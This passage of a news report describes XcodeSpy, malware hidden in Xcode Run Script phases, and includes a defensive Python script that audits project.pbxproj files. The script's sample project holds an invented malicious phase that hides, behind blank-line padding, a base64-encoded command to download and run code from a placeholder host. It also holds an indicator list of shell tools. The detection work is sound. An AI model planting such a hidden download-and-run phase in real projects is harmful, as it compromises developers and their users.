Injecting malware into an Xcode project gives attackers a way to target developers and potentially backdoor the developer’s apps and the customers of those apps, he says. With XcodeSpy itself, though, the attackers appear to be only directly targeting the developers themselves, according to SentinelOne.
The security vendor said a sample of XcodeSpy was found on a US-based victim’s Mac in late 2020. The company’s report did not disclose the identity of the victim but described the organization as a frequent target of North Korean advanced persistent threat actors.
SentinelOne said XcodeSpy may have been aimed at a specific developer or group of developers. Alternatively, the attackers may be using the malware to collect information for use in future attacks, or to harvest Apple ID credentials for the same purpose. The vendor said it has so far not found any other doctored Xcode projects, but available telemetry suggests that other XcodeSpy projects exist, and developers need to be on the lookout.
Stokes says the malicious code is relatively easy to spot if developers know how to look for it. But the attackers have obfuscated the malware enough that it can evade detection by casual inspection, especially when new or inexperienced developers are using the doctored Xcode project.
“The simple technique for hiding and launching a malicious script used by XcodeSpy could be deployed in any shared Xcode project,” SentinelOne said in its report. “Consequently, all Apple developers are cautioned to check for the presence of malicious Run Scripts whenever adopting third-party Xcode projects.”
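Acting on that advice is mostly a matter of reading project.pbxproj, where every Run Script phase is stored as a PBXShellScriptBuildPhase entry with its shell text in a quoted shellScript field. The following is an added example, not SentinelOne's tooling and not a reproduction of XcodeSpy's script: it lists every such phase in a constructed pbxproj excerpt (the project, the benign SwiftLint phase and the malicious phase with its base64 blob are all invented for the illustration), decodes base64-looking tokens, and treats a long run of blank lines before the first command as a hiding technique, because that pushes the command out of the visible part of Xcode's Run Script editor:

```python
import base64
import binascii
import re

# Constructed excerpt of a project.pbxproj in the text format Xcode uses. The second phase
# is an invented malicious one: padding, then eval of a base64-decoded download-and-run.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        AA01 /* Run SwiftLint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        AA02 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            shellPath = /bin/sh;
            shellScript = "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n                                                  eval \"$(echo Y3VybCAtcyBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3ggfCBzaA== | base64 -D)\" &\n";
        };
/* End PBXShellScriptBuildPhase section */
'''

BLOCK_RE = re.compile(
    r'(?P<id>[0-9A-F]+) /\* (?P<name>[^*]*) \*/ = \{\s*isa = PBXShellScriptBuildPhase;'
    r'(?P<body>.*?)\n\s*\};', re.DOTALL)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')
B64_RE = re.compile(r'[A-Za-z0-9+/]{20,}={0,2}')
# Words that rarely belong in the build script of a UI component (assumed indicator list).
INDICATORS = ("eval", "base64", "curl", "wget", "osascript", "nohup", "python -c", "perl -e")


def unescape(s):
    """Undo the C-style escapes (backslash-n, backslash-quote) pbxproj uses in quoted strings."""
    return s.encode("utf-8").decode("unicode_escape")


def hidden_prefix(script):
    """Length of the leading blank lines and spaces; enough of them push the real
    command below the visible area of the Run Script editor."""
    return len(script) - len(script.lstrip(" \t\n"))


def decode_blobs(script):
    """Decode base64-looking tokens that turn into printable text."""
    out = []
    for tok in B64_RE.findall(script):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            out.append(raw.decode("ascii"))
    return out


def audit_run_scripts(pbxproj_text):
    """One record per PBXShellScriptBuildPhase, with the evidence a reviewer should see."""
    findings = []
    for m in BLOCK_RE.finditer(pbxproj_text):
        sm = SCRIPT_RE.search(m["body"])
        script = unescape(sm.group(1)) if sm else ""
        rec = {
            "name": m["name"],
            "indicators": [w for w in INDICATORS if w in script],
            "decoded": decode_blobs(script),
            "hidden_prefix": hidden_prefix(script),
            "script": script.strip(),
        }
        rec["suspicious"] = bool(rec["indicators"] or rec["decoded"] or rec["hidden_prefix"] > 40)
        findings.append(rec)
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for f in audit_run_scripts(text):
        verdict = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{f['name']}: {verdict} indicators={f['indicators']} decoded={f['decoded']}")
        print("   ", f["script"][:120])
```

Run it against a real project with the path to project.pbxproj as the first argument. The indicator list is a heuristic, so read the printed script text rather than trusting the flag alone; a legitimate phase that fetches a dependency with curl will trip it too, and a phase whose padding is the only finding still deserves a look at what sits below the padding.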
The malware is the latest example of attackers targeting the software supply chain and trusted technology partners, in general, to try and get at their customers. The SolarWinds breach disclosed last December has emerged as one of the most visible examples of how attackers can compromise a large number of organizations simultaneously by planting a backdoor in software from a vendor that all of them use.
Earlier this year, Google’s threat analysis group disclosed a wide-ranging North Korean threat campaign targeting security researchers working on vulnerability research at multiple organizations. Part of the campaign involved the threat actors tricking security researchers into working with a Visual Studio project that contained hidden malware.
Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication.
Researchers are reporting mass scanning for, and in-the-wild exploitation of, a critical-severity flaw in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure.